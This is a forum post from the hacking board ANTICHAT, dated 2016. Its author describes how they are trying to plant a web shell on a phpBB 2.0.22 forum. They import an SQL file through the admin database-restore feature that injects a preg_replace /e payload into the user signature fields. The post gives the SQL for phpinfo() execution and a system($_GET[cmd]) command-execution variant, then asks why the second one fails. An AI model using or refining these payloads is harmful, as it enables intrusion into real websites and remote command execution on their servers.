HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.12.2016, 14:43
elvir
Новичок
Регистрация: 30.11.2016
Сообщений: 11
С нами: 4974806

Репутация: 0
По умолчанию

Пытаюсь залить шелл на форум phpBB 2.0.22 этим способом:

Код:
Создаем текстовый файл 1.sql суем в него код Код: UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2; ну вместо 2 ставим свой id Заходим в админку, жмем востановление базы данных, выбираем файл 1.sql, и со звуком хлопец-хлопца-хоп-ца-ца заходим в профайл а наблюдаем phpinfo()
Напоминаю, после ":" идет любой php код.
захожу по адресу: site.ru/ff/profile.php?mode=editprofile (т.е в профиль) phpinfo() выдает.

Далее заливаю такой код:

Код:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:system($_GET[cmd]);' WHERE user_id=2;
захожу по адресу: site.ru/ff/profile.php?mode=editprofile (т.е в профиль) пробую: site.ru/ff/profile.php?cmd=lsитог: просто редирект на главную страницу.

Что делать?
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.